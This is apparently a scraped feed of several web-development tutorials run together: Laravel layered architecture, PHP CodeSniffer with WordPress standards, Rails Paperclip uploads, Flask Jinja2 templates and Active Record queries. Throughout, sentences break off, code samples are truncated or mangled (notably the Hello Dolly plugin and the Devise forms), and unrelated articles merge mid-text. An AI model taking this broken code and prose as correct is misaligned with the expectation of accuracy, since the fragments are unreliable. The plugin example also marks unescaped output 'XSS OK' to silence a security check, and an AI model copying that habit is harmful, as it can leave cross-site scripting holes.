And if you're looking for some additional utilities to purchase, review, or use, check out the .NET offering in CodeCanyon.
I hope you enjoyed this tutorial and found it useful for building your Web APIs for mobile devices. Thanks!]]>.,.
In this article, I am not planning to talk about object-oriented design..e. isolate every part of the design to concentrate more on specific sections. The system must be able to interact between sections. Layered Architecture is the idea of isolation of each part based on years of experience and convention. The Layers are listed below:, the upper layers can communicate with lower layers. If the lower layers need to connect with an upper layer, they must use patterns such as callbacks or observers.
If you are inspired to see how Domain-Driven Design could be applied\Application\controllers';
And also you can configure the path of view in
config/view.php:
//... 'paths' => [ realpath(base_path('App/Presentation')), //...
Now we have just configured, we need to use Datamapper (Doctrine ORM) instead of Active Record...
Stripe is a payment-processing service that comes with a suite of easy-to-use APIs and powers e-commerce for businesses of all sizes.
In this course, Envato Tuts+ instructor Jason Lewis will show you how to process payments on Stripe using Laravel Cashier..
Laravel is known for its powerful and developer-friendly router. The router allows you to configure all the URL endpoints of your app with a concise syntax and all in one place.
In this quick.
You can take all of these and more PHP courses with a free 10-day trial of our monthly subscription. So get started today, and start learning the practical Laravel skills that will take your PHP development work to a new level.]]>
You!]]> remainder of the article.
The articles are:
In short, the articles above will introduce the concept of code smells, which we've been defining as the following:
[A] code smell, also known as a bad smell, in computer programming code, refers to any symptom in the source code of a program that possibly indicates a deeper problem.
And I will walk you through the steps needed to install PHP CodeSniffer on your machine.
But.
This should be a very short list. If you've followed along with the series up to this point, you need to have:
All of this is covered in detail throughout the previous articles in the series, but if you've gotten this far and are comfortable with the command line then this should be a cinch in comparison to what we've done so far.
With all of that said, let's get started.
First, locate the WordPress Coding Standards rules on GitHub. They're easy to find.
You can read all about the details of the project from the project page, but the most important thing I'd like to share is as follows:
This project is a collection of PHP_CodeSniffer rules (sniffs) to validate code developed for WordPress. It ensures code quality and adherence to coding conventions, especially the official WordPress Coding Standards.
I'd like to bring your attention to the phrase that this references the "official WordPress Coding Standards." Note that these rules are based on the WordPress Coding Standards. That is, you can't officially reference them.
If you're looking to find a way to look through the rules that WordPress defines, check out this article in the Codex. It's easy to follow, easy to read, but a lot to remember. Thankfully, we have the rule set linked above.
The important thing to note is that even if you aren't familiar with the rules, the CodeSniffer will find the problems with your code and will notify you of what you need to fix. Though you don't have to read the Codex article, it can sometimes help in identifying what's needed based on the errors or warnings the sniffer generates.
Assuming you've properly installed PHP CodeSniffer, let's add the WordPress rules to the software. For this tutorial, I'm going to do everything via the command line so as to be as platform agnostic as possible. I'll offer a few words regarding IDEs and rules at the end of the series.
Open your Terminal and navigate to where you have your copy of PHP CodeSniffer installed. If you've been following along with this series of tutorials, then you likely recall we have a
composer.json file that will pull this in for us. If not, remember to create
composer.json in the root of your project and add this to the file:
{ "require": { "squizlabs/php_codesniffer": "2.*" } }
Once done, run
$ composer update from your Terminal and you'll have everything you need to get going. To verify the installation, run the following command:
$ vendor/bin/phpcs --version
And you should see something like the following output:
PHP_CodeSniffer version 2.6.0 (stable) by Squiz ()
Perfect. Next, let's install the WordPress rules. Since we're using Composer (and will continue to do so), this is very easy to do.
Run the following command from within the root directory of your project:
composer create-project wp-coding-standards/wpcs:dev-master --no-dev
Note that you may be prompted with the following question:
Do you want to remove the existing VCS (.git, .svn..) history? [Y,n]?
If you know what you're doing, then feel free to go ahead and select 'n'; otherwise, you'll be fine hitting 'y'.
Now that PHP CodeSniffer is installed, and the WordPress rules are installed, we need to make sure PHP CodeSniffer is aware of our new ruleset. To do this, we need to enter the following command in the command line.
From the root of your project directory, enter the following command:
$ vendor/bin/phpcs --config-set installed_paths wpcs
To verify that the new rules have been added, we can ask PHP CodeSniffer to report to us the sets of rules that it currently has available. In the Terminal, enter the following command:
$ vendor/bin/phpcs -i
And you should see the following output (or something very similar):
The installed coding standards are MySource, PEAR, PHPCS, PSR1, PSR2, Squiz, Zend, WordPress, WordPress-Core, WordPress-Docs, WordPress-Extra and WordPress-VIP
Notice in the line above that we have several sets of rules regarding WordPress. Pretty neat, isn't it? Of course, let's see how this stacks up when we run the rule sets against a plugin like Hello Dolly.
Assuming you're working out of a directory that includes a WordPress plugin, then you can skip the following step. If, on the other hand, you do not have a copy of a WordPress script, file, theme, or plugin installed in the project directory, go ahead and copy one over to your project directory now.
As mentioned, we'll be testing the Hello Dolly plugin.
To run PHP CodeSniffer with the WordPress rules against the files in the plugin directory, enter the following command in the Terminal:
$ vendor/bin/phpcs --standard=WordPress hello-dolly
This will result in output that should correspond to what you see here:
FILE: /Users/tommcfarlin/Desktop/tutsplus_demo/hello-dolly/hello.php ---------------------------------------------------------------------- FOUND 14 ERRORS AFFECTING 14 LINES ---------------------------------------------------------------------- 2 | ERROR | Missing short description in doc comment 5 | ERROR | There must be exactly one blank line after the file | | comment 6 | ERROR | Empty line required before block comment 15 | ERROR | You must use "/**" style comments for a function | | comment 46 | ERROR | Inline comments must end in full-stops, exclamation | | marks, or question marks 49 | ERROR | Inline comments must end in full-stops, exclamation | | marks, or question marks 53 | ERROR | Inline comments must end in full-stops, exclamation | | marks, or question marks 54 | ERROR | You must use "/**" style comments for a function | | comment 56 | ERROR | Expected next thing to be an escaping function (see | | Codex for 'Data Validation'), not '"<p | |$chosen</p>"' 59 | ERROR | Inline comments must end in full-stops, exclamation | | marks, or question marks 62 | ERROR | Inline comments must end in full-stops, exclamation | | marks, or question marks 63 | ERROR | You must use "/**" style comments for a function | | comment 64 | ERROR | Inline comments must end in full-stops, exclamation | | marks, or question marks 67 | ERROR | Expected next thing to be an escaping function (see | | Codex for 'Data Validation'), not '" | | ' ----------------------------------------------------------------------
Of course, some of these things may change depending on when you're reading this tutorial.
The errors should be pretty clear as to what needs to be fixed:
Note that although these are errors or warnings, the code will obviously still work. But let's pull this through end-to-end and see what it's like to fix up a plugin, arguably the most popular since it comes with each installation of WordPress, and review the differences in the quality of the code.
Note the plugin, before we begin working on it, includes the following source code:
<?php /** * ) ] ); } // This just echoes the chosen line, we'll position it later function hello_dolly() { $chosen = hello_dolly_get_lyric(); echo "<p id='dolly'>$chosen</p>"; } // Now we set that function up to execute when the admin_notices action is called add_action( 'admin_notices', 'hello_dolly' ); // We> "; } add_action( 'admin_head', 'dolly_css' ); ?>
It should be relatively easy to follow as it uses only a few basic PHP features and Matt's done a good job of commenting the code.
But given the 14 errors that the CodeSniffer found, let's refactor the plugin. Taking into account the errors they presented and what it's expecting to see, let's address each of them.
Once done, the plugin should look like the following:
<?php /** * This is a plugin that symbolizes the hope and enthusiasm of an entire * generation summed up in two words sung most famously by Louis Armstrong. * * @package Hello_Dolly * @version 1.6 * * @wordpress-plugin *: */ /** * Defines the lyrics for 'Hello Dolly'. * * @return string A random line of from the lyrics to the song. */ ) ] ); } add_action( 'admin_notices', 'hello_dolly' ); /** * This just echoes the chosen line, we'll position it later. This function is * set up to execute when the admin_notices action is called. */ function hello_dolly() { $chosen = hello_dolly_get_lyric(); echo "<p id='dolly'>$chosen</p>"; // WPCS: XSS OK. } add_action( 'admin_head', 'dolly_css' ); /** *> "; // WPCS: XSS OK. }
Notice that the plugin continues to work and the code is a bit cleaner. Lastly, let's verify that this passes the PHP CodeSniffer test. Let's re-run the code that we used above to initially evaluate the plugin.
$ vendor/bin/phpcs --standard=WordPress hello-dolly
And the output that we see:
Skyhopper5:tutsplus_demo tommcfarlin$
Exactly: There should be no output. Instead, it should be a return to the standard command prompt.
Excellent. The plugin has been brought up to standard. This is why having a code sniffer is so valuable: It finds the errors in your code based on the rules you define and then reports any errors that may exist.
Ultimately, this ensures that you're releasing the highest quality written code into a production-level site. Now, this does not mean you should avoid unit testing or other types of testing, nor does this mean bugs don't exist. It just means that your code is up to a high standard.
And with that, we conclude the series on using PHP CodeSniffer. Recall that throughout the series, we have covered the idea of code smells, how to refactor them, and what tools are available to us when working with PHP applications.
In this article, we saw how we can use a provided set of rules for the WordPress Coding Standards to evaluate our code while working on a new or an existing project. Note that some IDEs support the ability to execute the rules while writing code.
Although that's beyond the scope of this particular tutorial, you can find resources for this in various places throughout the web. Simply search for your IDE by name, determine its support for PHP CodeSniffer, and then make sure to install the WordPress rules as we've detailed in this tutorial.
If you enjoyed this article or this series, you might be interested in checking out other things I've written both on my profile page or on my blog. You can also follow me on Twitter at @tommcfarlin where I often talk about and share various software development practices within the context of WordPress.
With that said, don't hesitate to leave any questions or comments in the feed below and I'll aim to respond to each of.
To follow along, you'll..:
The problem is that they're superimposed over each other, and they need to be next to the relevant person. Let's fix that.:
That's looking better. Now to add some styling.
I want to change the font and add quotation marks around the:
Fantastic! I now have my text in the right place with quotation marks around it. My client can now add as many quotes as they want, assign them to the appropriate sliders, and the conversation will continue.: installation of ImageMagick on your machine. You need this for image processing. To install ImageMagick, use any of the steps below, depending on the type of machine you use.
Mac Users:
brew install imagemagick
Ubuntu users:
sudo apt-get install imagemagick
Use your terminal to generate a new application.
rails new paperclip
Open up your Gemfile and add the necessary gems:
gem 'paperclip'
gem 'devise'
Run bundle install when you are done.
From your terminal, install devise using the command below:
rails generate devise:install
When that is done, you can now generate your User model:
rails generate devise User
Migrate your database after.
rake db:migrate
Generate your devise views.
rails generate devise:views
Using your text editor, navigate to
app/views/layouts/application.html.erb and add the following code just above the
yield block.
#app/views/layouts/application.html.erb <p class="notice"><%= notice %></p> <p class="alert"><%= alert %></p>
Due to security reasons, we have to permit parameters in the Devise controller. Thanks to the awesome team behind Devise, doing this is easy.
Open up
app/controllers/application_controller.rb and paste in the following lines of code.
devise_parameter_sanitizer.for(:sign_up) { |u| u.permit(:username, :email, :password, :password_confirmation, :remember_me, :avatar, :avatar_cache) } devise_parameter_sanitizer.for(:account_update) { |u| u.permit(:username, :password, :password_confirmation, :current_password, :avatar) } end end
Open up your
User model and make it look like this:
#app/models/user.rb class User < ActiveRecord::Base # Include default devise modules. Others available are: # :confirmable, :lockable, :timeoutable and :omniauthable devise :database_authenticatable, :registerable, :recoverable, :rememberable, :trackable, :validatable has_attached_file :avatar, styles: { medium: "300x300", thumb: "100x100" } validates_attachment_content_type :avatar, content_type: /\Aimage\/.*\Z/ end
You need to add an
avatar column to your Users table. There is a rails command that makes this possible from your terminal.
rails generate migration add_avatar_to_users
That will create a new migration in
db/migrate. Open it up and paste the below code:
class AddAvatarToUsers < ActiveRecord::Migration def up add_attachment :users, :avatar end def down remove_attachment :users, :avatar end end
Run your migration
rake db:migrate
You will edit your registration new form
app/views/devise/registrations/new.html.erb and edit the form
app/views/devise/registrations/edit.html.erb to what I have below:
#app/views/devise/registrations/new.html.erb <h2>Sign up</h2> <%= form_for(resource, as: resource_name, url: registration_path(resource_name), html: { multipart: true })"> <%= f.file_field :avatar %> </div> <div class="actions"> <%= f.submit "Sign up" %> </div> <% end %> <%= render "devise/shared/links" %>
%>
Kick off your browser and check out what you have.
For a standard application, you might want to check if a user who wants to edit his or her profile already has an avatar uploaded. This is easy to implement in your registration edit file.
Open up the registration edit file and make it look like this:
%> <% if @user.avatar? %> <%= image_tag @user.avatar.url(:thumb) %> <% end %> < %>
Can you see what changed?
In the above code, there is a conditional statement to check if an avatar already exists for a user using the line
<% if @user.avatar? %>. If this returns true, the next line gets run, else it does not.
Validation is always important when enabling uploading features in your web application. Paperclip comes with measures to secure your application.
You can use any of the validations below in your model.
class User < ActiveRecord::Base has_attached_file :avatar # Validate content type validates_attachment_content_type :avatar, content_type: /\Aimage/ # Validate filename validates_attachment_file_name :avatar, matches: [/png\Z/, /jpe?g\Z/] # Explicitly do not validate do_not_validate_attachment_file_type :avatar end
You might want to consider Paperclip as you build your next web application. It has a great team supporting it.
To explore other features not covered in this tutorial, check Paperclip's GitHub page.]]>.
Ultimately, we're working towards implementing WordPress-specific code sniffing rules, but before we do that it's important to familiarize yourself with PHP CodeSniffer.
In this article, we're going to take a look at what PHP CodeSniffer is, how to install it, how to run it against an example script, and how to refactor said script. Then we'll look at how we're going to move forward into WordPress-specific code.
If you have a local development environment set up, then great; if not, that's fine. I'll provide some links that will get you up and running quickly.
With that said, let's get started.
Before getting started, it's important that you have some type of local development environment, even if this only includes a copy of the PHP interpreter..
Sl.
To follow along, you'll need::
In the next part, we'll add CSS to our theme to position the text correctly, creating the conversation effect, and to style it.
So let's get started!:
I'm adding styling in my stylesheet because I want to use Google fonts, so I'm not too worried about the settings for the fonts, but you might prefer to tweak those in the settings screen.
The next step is to add the sliders and populate them with posts.
We need to add two sliders: one for each of the two people. Go to Smooth Slider > Sliders and click on Create New Slider. I've called my two sliders 'Heide' and 'Iain' because those are the names of the people..
Sliders aren't just for images: you can use them to display text too. In this tutorial, you've learned how to set up two sliders using a custom post type. Next we'll add the styling to make our text look the way it should.]]>
Welcome.
It offers a variety of features for managing email quickly and efficiently for your application::
In some cases, the attachments are large and cause time-outs when we try to POST the data to their servers. In other cases, there is a large volume of inbound email and customers would rather just run a GET request at some interval instead of having to handle multiple POSTs from us. Finally, it serves as redundancy in case their web service goes down and they can't accept our POSTs..!]]>
Oft:
Contact_Informationclass that allows us to instantiate an object that includes all payment information for a person.
Payment_Informationclass that allows us to maintain the credit card or debit card number for a person as well as other details associated with that payment method..]]>.
Flask comes packaged with Jinja2, and hence we just need to install Flask. For this series, I recommend using the development version of Flask, which includes much more stable command line support among many other features and improvements to Flask in general.
pip install
In Flask, we can write a complete web application without the need of any third-party templating engine. Let's have a look at a small
Hello World app.
By default, Flask expects the templates to be placed in a folder named
templates at the application root level. Flask then automatically reads the contents by making this folder available for use with the
render_template() method. I will demonstrate the same by restructuring the trivial
Hello World application shown above.
The application structure would be as shown below.
flask_app/ my_app.py templates/ - index.html
from flask import Flask, render_template, request app = Flask(__name__) @app.route('/') @app.route('/hello') @app.route('/hello/<user>') def hello_world(user=None): user = user or 'Shalabh' return render_template('index.html', user=user)
the last part of the URL after
hello is and
static/js/bootstrap.min.js can be downloaded from the bootstrap website mentioned above. The rest of the application code is demonstrated below. and
product, where the former serves the purpose of listing all the products and the latter opens up the individual page.
body { padding-top: 50px; } .top-pad { padding: 40px 15px; text-align: center; }
This file holds a bit of custom CSS that I added to make the templates more legible. Let's look at the templates now.
<.
{% extends 'base.html' %} {% block container %} <div class="top-pad"> {% for id, product in products.iteritems() %} <div class="well"> <h2> <a href="{{ url_for('product', key=id) }}">{{product['name'] }}</a> <small>$ {{ product['price'] }}</small> </h2> </div> {% endfor %} </div> {% endblock %}
See how this template extends
base.html and provides the contents of
{% block container %}.
{% for %} behaves just like a normal for loop in any language which we are using here to create a list of products.
{%.]]>
In this second article, we’ll dive a little deeper into Active Record queries in Rails. In case you are still new to SQL, I’ll add examples that are simple enough that you can tag along and pick up the syntax a bit as we go.
That being said, it would definitely help if you run through a quick SQL tutorial before you come back to continue to read. Otherwise, take your time to understand the SQL queries we used, and I hope that by the end of this series it won’t feel intimidating anymore.
Most of it is really straightforward, but the syntax is a bit weird if you just started out with coding—especially in Ruby. Hang in there, it’s no rocket science!
These queries include more than one database table to work with and might be the most important to take away from this article. It boils down to this: instead of doing multiple queries for information that is spread over multiple tables,
includes tries to keep these to a minimum. The key concept behind this is called “eager loading” and means that we are loading associated objects when we do a find.
If we did that by iterating over a collection of objects and then trying to access its associated records from another table, we would run into an issue that is called the “N + 1 query problem”. For example, for each
agent.handler in a collection of agents, we would fire separate queries for both agents and their handlers. That is what we need to avoid since this does not scale at all. Instead, we do the following:
agents = Agent.includes(:handlers)
If we now iterate over such a collection of agents—discounting that we haven't limited the number of records returned for now—we'll end up with two queries instead of possibly a gazillion.
SELECT "agents".* FROM "agents" SELECT "handlers".* FROM "handlers" WHERE "handlers"."id" IN (1, 2)
This one agent in the list has two handlers, and when we now ask the agent object for its handlers, no additional database queries need to be fired. We can take this a step further, of course, and eager load multiple associated table records. If we needed to load not only handlers but also the agent’s associated missions for whatever reason, we could use
includes like this.
agents = Agent.includes(:handlers, :mission)
Simple! Just be careful about using singular and plural versions for the includes. They depend on your model associations. A
has_many association uses plural, while a
belongs_to or a
has_one needs the singular version, of course. If you need, you can also tuck on a
where clause for specifying additional conditions, but the preferred way of specifying conditions for associated tables that are eager loaded is by using
joins instead.
One thing to keep in mind about eager loading is that the data that will be added on will be sent back in full to Active Record—which in turn builds Ruby objects including these attributes. This is in contrast to “simply” joining the data, where you will get a virtual result that you can use for calculations, for example, and will be less memory draining than includes.
Joining tables is another tool that lets you avoid sending too many unnecessary queries down the pipeline. A common scenario is joining two tables with a single query that returns some sort of combined record.
joins is just another finder method of Active Record that lets you—in SQL terms—
JOIN tables. These queries can return records combined from multiple tables, and you get a virtual table that combines records from these tables. This is pretty rad when you compare that to firing all kinds of queries for each table instead. There are a few different kinds of data overlap you can get with this approach.
The inner join is the default modus operandi for
joins. This matches all the results that match a certain id and its representation as a foreign key from another object or table. In the example below, put simply: give me all missions where the mission’s
id shows up as
mission_id in an agent’s table.
"agents"."mission_id" = "missions"."id". Inner joins exclude relationships that don’t exist.
Mission.joins(:agents)
SELECT "missions".* FROM "missions" INNER JOIN "agents" ON "agents"."mission_id" = "mission"."id"
So we are matching missions and their accompanying agents—in a single query! Sure, we could get the missions first, iterate over them one by one, and ask for their agents. But then we would go back to our dreadful “N + 1 query problem”. No, thank you!
What’s also nice about this approach is that we won’t get any nil cases with inner joins; we only get records returned that match their ids to foreign keys in associated tables. If we need to find missions, for example, that lack any agents, we would need an outer join instead. Since this currently involves writing your own
OUTER JOIN SQL, we will look into this in the last article. Back to standard joins, you can also join multiple associated tables, of course.
Mission.joins(:agents, :expenses, :handlers)
And you can add onto these some
where clauses to specify your finders even more. Below, we are looking only for missions that are executed by James Bond and only the agents that belong to the mission 'Moonraker' in the second example.
Mission.joins(:agents).where( agents: { name: 'James Bond' })
SELECT "missions".* FROM "missions" INNER JOIN "agents" ON "agents"."mission_id" = "missions"."id" WHERE "agents"."name" = ? [["name", "James Bond"]]
Agent.joins(:mission).where( missions: { mission_name: 'Moonraker' })
SELECT "agents".* FROM "agents" INNER JOIN "missions" ON "missions"."id" = "agents"."mission_id" WHERE "missions"."mission_name" = ? [["mission_name", "Moonraker"]]
With
joins, you also have to pay attention to singular and plural use of your model associations. Because my
Mission class
has_many :agents, we can use the plural. On the other hand, for the
Agent class
belongs_to :mission, only the singular version works without blowing up. Important little detail: the
where part is simpler. Since you are scanning for multiple rows in the table that fulfill a certain condition, the plural form always makes sense.
Scopes are a handy way to extract common query needs into well-named methods of your own. That way they are a bit easier to pass around and also possibly easier to understand if others have to work with your code or if you need to revisit certain queries in the future. You can define them for single models but use them for their associations as well.
The sky is the limit really—
joins,
includes, and
where are all fair game! Since scopes also return
ActiveRecord::Relations objects, you can chain them and call other scopes on top of them without hesitation. Extracting scopes like that and chaining them for more complex queries is very handy and makes longer ones all the more readable. Scopes are defined via the “stabby lambda” syntax:
class Mission < ActiveRecord::Base has_many: agents scope :successful, -> { where(mission_complete: true) } end Mission.successful
class Agent < ActiveRecord::Base belongs_to :mission scope :licenced_to_kill, -> { where(licence_to_kill: true) } scope :womanizer, -> { where(womanizer: true) } scope :gambler, -> { where(gambler: true) } end # Agent.gambler # Agent.womanizer # Agent.licenced_to_kill # Agent.womanizer.gambler Agent.licenced_to_kill.womanizer.gambler
SELECT "agents".* FROM "agents" WHERE "agents"."licence_to_kill" = ? AND "agents"."womanizer" = ? AND "agents"."gambler" = ? [["licence_to_kill", "t"], ["womanizer", "t"], ["gambler", "t"]]
As you can see from the example above, finding James Bond is much nicer when you can just chain scopes together. That way you can mix and match various queries and stay DRY at the same time. If you need scopes via associations, they are at your disposal as well:
Mission.last.agents.licenced_to_kill.womanizer.gambler
SELECT "missions".* FROM "missions" ORDER BY "missions"."id" DESC LIMIT 1 SELECT "agents".* FROM "agents" WHERE "agents"."mission_id" = ? AND "agents"."licence_to_kill" = ? AND "agents"."womanizer" = ? AND "agents"."gambler" = ? [["mission_id", 33], ["licence_to_kill", "t"], ["womanizer", "t"], ["gambler", "t"]]
You can also redefine the
default_scope for when you are looking at something like
Mission.all.
class Mission < ActiveRecord::Base default_scope { where status: "In progress" } end Mission.all
SELECT "missions".* FROM "missions" WHERE "missions"."status" = ? [["status", "In progress"]]
This section is not so much advanced in terms of the understanding involved, but you will need them more often than not in scenarios that can be considered a bit more advanced than your average finder—like
.all,
.first,
.find_by_id or whatever. Filtering based on basic calculations, for example, is most likely something that newbies don’t get in touch with right away. What are we looking at exactly here?
sum
count
minimum
maximum
average
Easy peasy, right? The cool thing is that instead of looping through a returned collection of objects to do these calculations, we can let Active Record do all this work for us and return these results with the queries—in one query preferably. Nice, huh?
count
Mission.count # => 24
SELECT COUNT(*) FROM "missions"
average
Agent.average(:number_of_gadgets).to_f # => 3.5
SELECT AVG("agents"."number_of_gadgets") FROM "agents"
Since we now know how we can make use of
joins, we can take this one step further and only ask for the average of gadgets the agents have on a particular mission, for example.
Agent.joins(:mission).where(missions: {name: 'Moonraker'}).average(:number_of_gadgets).to_f # => 3.4
SELECT AVG("agents"."number_of_gadgets") FROM "agents" INNER JOIN "missions" ON "missions"."id" = "agents"."mission_id" WHERE "missions"."name" = ? [["name", "Moonraker"]]
Grouping these average number of gadgets by missions' names becomes trivial at that point. See more about grouping below:
Agent.joins(:mission).group('missions.name').average(:number_of_gadgets)
SELECT AVG("agents"."number_of_gadgets") AS average_number_of_gadgets, missions.name AS missions_name FROM "agents" INNER JOIN "missions" ON "missions"."id" = "agents"."mission_id" GROUP BY missions.name
sum
Agent.sum(:number_of_gadgets) Agent.where(licence_to_kill: true).sum(:number_of_gadgets) Agent.where.not(licence_to_kill: true).sum(:number_of_gadgets)
SELECT SUM("agents"."number_of_gadgets") FROM "agents" SELECT SUM("agents"."number_of_gadgets") FROM "agents" WHERE "agents"."licence_to_kill" = ? [["licence_to_kill", "t"]] SELECT SUM("agents"."number_of_gadgets") FROM "agents" WHERE ("agents"."licence_to_kill" != ?) [["licence_to_kill", "t"]]
maximum
Agent.maximum(:number_of_gadgets) Agent.where(licence_to_kill: true).maximum(:number_of_gadgets)
SELECT MAX("agents"."number_of_gadgets") FROM "agents" SELECT MAX("agents"."number_of_gadgets") FROM "agents" WHERE "agents"."licence_to_kill" = ? [["licence_to_kill", "t"]]
minimum
Agent.minimum(:iq) Agent.where(licence_to_kill: true).minimum(:iq)
SELECT MIN("agents"."iq") FROM "agents" SELECT MIN("agents"."iq") FROM "agents" WHERE "agents"."licence_to_kill" = ? [["licence_to_kill", "t"]]
All of these aggregation methods are not letting you chain on other stuff—they are terminal. The order is important to do calculations. We don’t get an
ActiveRecord::Relation object back from these operations, which makes the music stop at that point—we get a hash or numbers instead. The examples below won’t work:
Agent.maximum(:number_of_gadgets).where(licence_to_kill: true) Agent.sum(:number_of_gadgets).where.not(licence_to_kill: true) Agent.joins(:mission).average(:number_of_gadgets).group('missions.name')
If you want the calculations broken down and sorted into logical groups, you should make use of a
GROUP clause and not do this in Ruby. What I mean by that is you should avoid iterating over a group which produces potentially tons of queries.
Agent.joins(:mission).group('missions.name').average(:number_of_gadgets) # => { "Moonraker"=> 4.4, "Octopussy"=> 4.9 }
SELECT AVG("agents"."number_of_gadgets") AS average_number_of_gadgets, missions.name AS missions_name FROM "agents" INNER JOIN "missions" ON "missions"."id" = "agents"."mission_id" GROUP BY missions.name
This example finds all the agents that are grouped to a particular mission and returns a hash with the calculated average number of gadgets as its values—in a single query! Yup! The same goes for the other calculations as well, of course. In this case, it really makes more sense to let SQL do the work. The number of queries we fire for these aggregations is just too important.
For every attribute on your models, say
name,
favorite_gadget and so on, Active Record lets you use very readable finder methods that are dynamically created for you. Sounds cryptic, I know, but it doesn’t mean anything other than
find_by_id or
find_by_favorite_gadget. The
find_by part is standard, and Active Record just tucks on the name of the attribute for you. You can even get to add an
! if you want that finder to raise an error if nothing can be found. The sick part is, you can even chain these dynamic finder methods together. Just like this:
Agent.find_by_name('James Bond') Agent.find_by_name_and_licence_to_kill('James Bond', true)
SELECT "agents".* FROM "agents" WHERE "agents"."name" = ? LIMIT 1 [["name", "James Bond"]] SELECT "agents".* FROM "agents" WHERE "agents"."name" = ? AND "agents"."licence_to_kill" = ? LIMIT 1 [["name", "James Bond"], ["licence_to_kill", "t"]]
Of course you can go nuts with this, but I think it loses its charm and usefulness if you go beyond two attributes:
Agent.find_by_name_and_licence_to_kill_and_womanizer_and_gambler_and_number_of_gadgets('James Bond', true, true, true, 3)
SELECT "agents".* FROM "agents" WHERE "agents"."name" = ? AND "agents"."licence_to_kill" = ? AND "agents"."womanizer" = ? AND "agents"."gambler" = ? AND "agents"."number_of_gadgets" = ? LIMIT 1 [["name", "James Bond"], ["licence_to_kill", "t"], ["womanizer", "t"], ["gambler", "t"], ["number_of_gadgets", 3]]
In this example, it is nevertheless nice to see how it works under the hood. Every new
_and_ adds an SQL
AND operator to logically tie the attributes together. Overall, the main benefit of dynamic finders is readability—tucking on too many dynamic attributes loses that advantage quickly, though. I rarely use this, maybe mostly when I play around in the console, but it’s definitely good to know that Rails offers this neat little trickery.
Active Record gives you the option to return objects that are a bit more focused about the attributes they carry. Usually, if not specified otherwise, the query will ask for all the fields in a row via
* (
SELECT "agents".*), and then Active Record builds Ruby objects with the complete set of attributes. However, you can
select only specific fields that should be returned by the query and limit the number of attributes your Ruby objects need to “carry around”.
Agent.select("name") => #<ActiveRecord::Relation [#<Agent 7: nil, name: "James Bond">, #<Agent id: 8, name: "Q">, ...]>
SELECT "agents"."name" FROM "agents"
Agent.select("number, favorite_gadget") => #<ActiveRecord::Relation [#<Agent id: 7, number: '007', favorite_gadget: 'Walther PPK'>, #<Agent id: 8, name: "Q", favorite_gadget: 'Broom Radio'>, ... ]>
SELECT "agents"."number", "agents"."favorite_gadget" FROM "agents"
As you can see, the objects returned will just have the selected attributes, plus their ids of course—that is a given with any object. It makes no difference if you use strings, as above, or symbols—the query will be the same.
Agent.select(:number_of_kills) Agent.select(:name, :licence_to_kill)
A word of caution: If you try to access attributes on the object that you haven’t selected in your queries, you will receive a
MissingAttributeError. Since the
id will be automatically provided for you anyway, you can ask for the id without selecting it, though.
Last but not least, you can write your own custom SQL via
find_by_sql. If you are confident enough in your own SQL-Fu and need some custom calls to the database, this method might come in very handy at times. But this is another story. Just don’t forget to check for Active Record wrapper methods first and avoid reinventing the wheel where Rails tries to meet you more than halfway.
Agent.find_by_sql("SELECT * FROM agents") Agent.find_by_sql("SELECT name, licence_to_kill FROM agents")
Unsurprisingly, this results in:
SELECT * FROM agents SELECT name, licence_to_kill FROM agents
Since scopes and your own class methods can be used interchangeably for your custom finder needs, we can take this one step further for more complex SQL queries.
class Agent < ActiveRecord::Base ... def self.find_agent_names query = <<-SQL SELECT name FROM agents SQL self.find_by_sql(query) end end
We can write class methods that encapsulate the SQL inside a Here document. This lets us write multi-line strings in a very readable fashion and then store that SQL string inside a variable which we can reuse and pass into
find_by_sql. That way we don’t plaster tons of query code inside the method call. If you have more than one place to use this query, it’s DRY as well.
Since this is supposed to be newbie-friendly and not an SQL tutorial per se, I kept the example very minimalistic for a reason. The technique for way more complex queries is quite the same, though. It’s easy to imagine having a custom SQL query in there that stretches beyond ten lines of code.
Go as nuts as you need to—reasonably! It can be a life saver. A word about the syntax here. The
SQL part is just an identifier here to mark the beginning and end of the string. I bet you won’t need this method all that much—let’s hope! It definitely has its place, and Rails land wouldn’t be the same without it—in the rare cases that you will absolutely want to fine-tune your own SQL with it.
I hope you got a bit more comfortable writing queries and reading the dreaded ol’ raw SQL. Most of the topics we covered in this article are essential for writing queries that deal with more complex business logic. Take your time to understand these and play around a bit with queries in the console.
I’m pretty sure that when you leave tutorial land behind, sooner or later your Rails cred will rise significantly if you work on your first real-life projects and need to craft your own custom queries. If you are still a bit shy of the topic, I’d say simply have fun with it—it really is no rocket science!]]>
|
http://www.4elements.com/blog/atom
|
CC-MAIN-2016-26
|
refinedweb
| 8,555
| 64.2
|
I have apache setup with:
DirectoryIndex index.jsp
I have mod_jk2 setup with:
[uri:/*.jsp]
The result is requests for index.jsp or for a directory with an index.jsp are
properly forwarded to tomcat, however if I request a directory with no index.jsp
file in that I want to have mod_autoindex handle, then mod_jk2 still forwards
that to tomcat which returns an error because there is no index file.
There needs to be support for forwarding using handlers, which would allow you
to properly configure a Files directive to handle them with a SetHandler.
Apache should be the one to figure out if the file exists. Another symptom of
this same problem is requesting /foo.jsp where foo.jsp doesn't exist. Apache
should be the one returning a 404, not tomcat.
I want Apache to be the one deciding what should be handled when I am using its
configuration directives. Using Location-style directives is a horrible idea
for such things as it is a security issue when you have various names that can
refer to the same file, eg. Windows. As the Apache documentation clearly
states, Location directives should not be used to control access to files on
disk but should only be used for true virtual namespaces.
This reads like an enhancement request to me.
I'm also seeing this problem.
Is there any idea on when this will be added/corrected?
How about any CVS code that resolves the problem?
Thanks
same problem here
This enhancement request has been transferred to Tomcat 5 because:
- TC4 and TC5 share the connectors
- TC4 is no longer being developed, only supported
As of November 15, 2004, JK2 is no longer supported. All bugs related to JK2
will be marked as WONTFIX. In its place, some of its features have been
backported to jk1. Most of those features will be seen in 1.2.7, which is
slated for release on November 30th, 2004.
Another alternative is the ajp addition to mod_proxy which will be part of
apache 2.
For more information on the Tomat connectors docs at
|
https://bz.apache.org/bugzilla/show_bug.cgi?id=19298
|
CC-MAIN-2019-09
|
refinedweb
| 350
| 66.74
|
